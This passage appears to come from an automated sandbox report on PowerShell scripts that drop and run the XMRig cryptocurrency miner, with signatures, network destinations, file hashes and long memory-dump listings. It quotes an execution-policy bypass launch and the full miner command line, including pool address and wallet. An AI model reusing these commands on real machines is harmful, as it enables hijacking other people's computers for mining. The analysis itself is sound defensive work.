memory/3088-137-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-138-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-139-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-140-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-141-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-142-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-143-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-144-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-145-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-146-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-147-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-148-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-149-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-150-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-151-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-152-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-153-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-154-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-155-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:36

Platform

win10-20240404-en

Max time kernel

1797s

Max time network

1785s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 28.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 240.143.123.92.in-addr.arpa udp

Files

memory/4112-4-0x00007FFF43B33000-0x00007FFF43B34000-memory.dmp

memory/4112-5-0x000001EB5EF00000-0x000001EB5EF22000-memory.dmp

memory/4112-7-0x00007FFF43B30000-0x00007FFF4451C000-memory.dmp

memory/4112-9-0x000001EB5F0B0000-0x000001EB5F126000-memory.dmp

memory/4112-10-0x00007FFF43B30000-0x00007FFF4451C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lzax4efi.bex.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4112-25-0x00007FFF43B30000-0x00007FFF4451C000-memory.dmp

memory/4112-48-0x000001EB5F580000-0x000001EB5F592000-memory.dmp

memory/4112-61-0x000001EB5F0A0000-0x000001EB5F0AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1492-90-0x000001C6E2900000-0x000001C6E2920000-memory.dmp

memory/1492-91-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-92-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/4112-93-0x00007FFF43B33000-0x00007FFF43B34000-memory.dmp

memory/4112-94-0x00007FFF43B30000-0x00007FFF4451C000-memory.dmp

memory/1492-95-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-96-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-97-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-98-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-99-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-100-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-101-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-102-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-103-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-104-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-105-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-106-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-107-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-108-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-109-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-110-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-111-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-112-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-113-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-114-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-115-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-116-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-117-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-118-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-119-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-120-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-121-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-122-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-123-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-124-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-125-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-126-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-127-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-128-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-129-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-130-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-131-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-132-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-133-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-134-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-135-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-136-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-137-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-138-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-139-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-140-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-141-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-142-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-143-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-144-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-145-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-146-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-147-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-148-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-149-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-150-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-151-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-152-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-153-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-154-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

memory/1492-155-0x00007FF6929A0000-0x00007FF6935D3000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:15

Platform

win10-20240404-en

Max time kernel

1796s

Max time network

1797s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 14.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp

Files

memory/3508-2-0x00007FF992773000-0x00007FF992774000-memory.dmp

memory/3508-5-0x0000019A99B90000-0x0000019A99BB2000-memory.dmp

memory/3508-6-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3508-9-0x0000019A99D90000-0x0000019A99E06000-memory.dmp

memory/3508-10-0x00007FF992770000-0x00007FF99315C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mepv04rq.1h4.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3508-25-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3508-48-0x0000019A99D50000-0x0000019A99D62000-memory.dmp

memory/3508-61-0x0000019A99BE0000-0x0000019A99BEA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3708-90-0x0000013153CC0000-0x0000013153CE0000-memory.dmp

memory/3508-91-0x00007FF992773000-0x00007FF992774000-memory.dmp

memory/3508-92-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3708-93-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3508-94-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3708-95-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-96-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-97-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-98-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-99-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-100-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-101-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-102-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-103-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-104-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-105-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-106-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-107-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-108-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-109-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-110-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-111-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-112-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-113-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-114-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-115-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-116-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-117-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-118-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-119-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-120-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-121-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-122-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-123-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-124-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-125-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-126-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-127-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-128-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-129-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-130-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-131-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-132-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-133-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-134-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-135-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-136-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-137-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-138-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-139-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-140-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-141-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-142-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-143-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-144-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-145-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-146-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-147-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-148-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-149-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-150-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-151-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-152-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-153-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-154-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-155-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

memory/3708-156-0x00007FF6A7580000-0x00007FF6A81B3000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:16

Platform

win10v2004-20240508-en

Max time kernel

1790s

Max time network

1745s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 32.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 25.173.189.20.in-addr.arpa udp

Files

memory/2108-0-0x00007FF8EF1A3000-0x00007FF8EF1A5000-memory.dmp

memory/2108-1-0x0000021E221A0000-0x0000021E221C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dq1ngru4.dqt.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
